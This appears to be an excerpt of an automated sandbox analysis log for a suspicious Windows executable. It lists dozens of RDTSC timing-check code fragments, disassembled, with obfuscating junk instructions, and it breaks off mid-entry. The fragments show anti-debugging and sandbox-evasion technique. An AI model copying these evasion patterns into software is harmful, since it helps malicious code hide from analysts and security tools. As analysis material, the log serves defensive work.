                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC037C second address: 4EC0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0382 second address: 4EC0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0391 second address: 4EC0395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE06FF second address: 4EE072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE072C second address: 4EE0750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0750 second address: 4EE0756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0756 second address: 4EE07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FD0F8CDABF9h 0x00000017 adc esi, 657A9726h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE07A2 second address: 4EE07A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE07A8 second address: 4EE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [775165FCh] 0x0000000d pushad 0x0000000e call 00007FD0F8CDABF0h 0x00000013 mov edx, eax 0x00000015 pop eax 0x00000016 popad 0x00000017 test eax, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007FD0F8CDABF6h 0x00000021 call 00007FD0F8CDABF2h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE07F9 second address: 4EE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE07FF second address: 4EE0816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B28DD45h 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov dh, 09h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, bl 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0816 second address: 4EE088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, eax 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c pushfd 0x0000000d jmp 00007FD0F8E1A7B8h 0x00000012 or esi, 2D25D248h 0x00000018 jmp 00007FD0F8E1A7ABh 0x0000001d popfd 0x0000001e popad 0x0000001f xor eax, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B5h 0x00000029 sbb ecx, 11F99F66h 0x0000002f jmp 00007FD0F8E1A7B1h 0x00000034 popfd 0x00000035 movzx esi, bx 0x00000038 popad 0x00000039 and ecx, 1Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE088D second address: 4EE08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE08A1 second address: 4EE08CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 ror eax, cl 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE08CC second address: 4EE08D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE08D0 second address: 4EE08D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE08D6 second address: 4EE08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE08DC second address: 4EE0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD0F8E1A7AEh 0x00000010 sbb eax, 1D00E6F8h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b popfd 0x0000001c call 00007FD0F8E1A7B8h 0x00000021 movzx eax, dx 0x00000024 pop ebx 0x00000025 popad 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [00552014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007FD0FD7EB00Dh 0x00000041 push FFFFFFFEh 0x00000043 jmp 00007FD0F8E1A7AAh 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FD0F8E1A7AAh 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0942 second address: 4EE0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0948 second address: 4EE09C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 and cl, FFFFFFE8h 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007FD0FD7EB04Ch 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 push ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B7h 0x00000029 xor ecx, 0A21DADEh 0x0000002f jmp 00007FD0F8E1A7B9h 0x00000034 popfd 0x00000035 pop esi 0x00000036 movsx ebx, si 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FD0F8E1A7B2h 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE09C5 second address: 4EE09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE09C9 second address: 4EE09CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE09CF second address: 4EE09D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, BD23h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE09D8 second address: 4EE09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7ABh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE09EE second address: 4EE0A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD0F8CDABEFh 0x0000000a adc cx, 3AFEh 0x0000000f jmp 00007FD0F8CDABF9h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 call 00007FD0F8CDABECh 0x0000001d jmp 00007FD0F8CDABF2h 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABEBh 0x00000029 sub ecx, 790F15BEh 0x0000002f jmp 00007FD0F8CDABF9h 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bh, 4Bh 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90019 second address: 4E9003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9003E second address: 4E900AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABF1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov si, 0D73h 0x00000015 pushfd 0x00000016 jmp 00007FD0F8CDABF8h 0x0000001b sub ah, 00000078h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD0F8CDABF0h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E900AA second address: 4E900B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E900B0 second address: 4E90144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 adc ah, 00000008h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and esp, FFFFFFF8h 0x0000001b jmp 00007FD0F8CDABEBh 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 movzx esi, di 0x00000025 pushfd 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b add ah, FFFFFFD6h 0x0000002e jmp 00007FD0F8CDABF1h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov ebx, esi 0x0000003b pushfd 0x0000003c jmp 00007FD0F8CDABF6h 0x00000041 jmp 00007FD0F8CDABF5h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90144 second address: 4E901B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B8h 0x0000000c sbb cx, 52B8h 0x00000011 jmp 00007FD0F8E1A7ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FD0F8E1A7B6h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 call 00007FD0F8E1A7B9h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E901B0 second address: 4E901F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0F8CDABECh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f sub esi, 1C129F3Eh 0x00000015 jmp 00007FD0F8CDABF9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E901F6 second address: 4E901FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E901FA second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90200 second address: 4E90214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90214 second address: 4E90236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90236 second address: 4E9026F instructions: 0x00000000 rdtsc 0x00000002 mov ah, E6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007FD0F8E1A7B2h 0x00000015 jmp 00007FD0F8E1A7B5h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9026F second address: 4E902A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABF8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902A1 second address: 4E902A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902A7 second address: 4E902DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902DD second address: 4E902E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E3 second address: 4E902E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E7 second address: 4E902EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902EB second address: 4E9030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0F8CDABF2h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9030A second address: 4E90341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD0F8E1A7B6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90341 second address: 4E90368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90368 second address: 4E903AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov ax, 2ED3h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 je 00007FD16B418A33h 0x0000001a jmp 00007FD0F8E1A7ABh 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edx, 0984C896h 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903AC second address: 4E903BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903BF second address: 4E903EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD16B4189F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903EA second address: 4E903EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903EE second address: 4E903F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903F4 second address: 4E90480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 add cl, 00000048h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 jmp 00007FD0F8CDABF8h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007FD0F8CDABF0h 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD0F8CDABECh 0x0000002d sub si, 4708h 0x00000032 jmp 00007FD0F8CDABEBh 0x00000037 popfd 0x00000038 mov ebx, eax 0x0000003a popad 0x0000003b mov cl, 6Eh 0x0000003d popad 0x0000003e test edx, 61000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD0F8CDABEAh 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80756 second address: 4E8075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8075C second address: 4E80760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80760 second address: 4E80780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7B5h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80780 second address: 4E8082C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 xor cx, 9FD8h 0x00000016 jmp 00007FD0F8CDABEBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov bl, ah 0x0000001f pushfd 0x00000020 jmp 00007FD0F8CDABEBh 0x00000025 add cl, FFFFFF9Eh 0x00000028 jmp 00007FD0F8CDABF9h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 pushad 0x00000033 mov al, B2h 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b xor si, 9386h 0x00000040 jmp 00007FD0F8CDABF1h 0x00000045 popfd 0x00000046 popad 0x00000047 and esp, FFFFFFF8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD0F8CDABEDh 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8082C second address: 4E808FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov cx, FE0Fh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 mov ax, dx 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FD0F8E1A7B9h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, edi 0x0000002a pushfd 0x0000002b jmp 00007FD0F8E1A7B7h 0x00000030 and ecx, 677BC2DEh 0x00000036 jmp 00007FD0F8E1A7B9h 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f call 00007FD0F8E1A7B3h 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B8h 0x0000004a add ecx, 45BFFD38h 0x00000050 jmp 00007FD0F8E1A7ABh 0x00000055 popfd 0x00000056 pop esi 0x00000057 popad 0x00000058 mov esi, dword ptr [ebp+08h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e movzx eax, di 0x00000061 mov dl, 18h 0x00000063 popad 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E808FD second address: 4E80923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD0F8CDABF4h 0x00000012 pop eax 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80923 second address: 4E8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8093A second address: 4E80975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FD0F8CDABF3h 0x00000015 pop esi 0x00000016 mov ch, dh 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80975 second address: 4E8097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8097B second address: 4E8097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8097F second address: 4E809B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B4201ADh 0x0000000e pushad 0x0000000f mov dl, BEh 0x00000011 mov ch, CDh 0x00000013 popad 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FD0F8E1A7B3h 0x00000020 mov ecx, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809B5 second address: 4E809B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809B9 second address: 4E809D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E809D4 second address: 4E80A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 054Ah 0x00000007 jmp 00007FD0F8CDABEBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD16B2E05A0h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD0F8CDABF4h 0x0000001c sbb ax, 1038h 0x00000021 jmp 00007FD0F8CDABEBh 0x00000026 popfd 0x00000027 jmp 00007FD0F8CDABF8h 0x0000002c popad 0x0000002d test byte ptr [77516968h], 00000002h 0x00000034 pushad 0x00000035 mov bl, al 0x00000037 pushad 0x00000038 mov eax, edx 0x0000003a mov esi, ebx 0x0000003c popad 0x0000003d popad 0x0000003e jne 00007FD16B2E055Ch 0x00000044 pushad 0x00000045 mov si, bx 0x00000048 mov ebx, 371E640Ch 0x0000004d popad 0x0000004e mov edx, dword ptr [ebp+0Ch] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 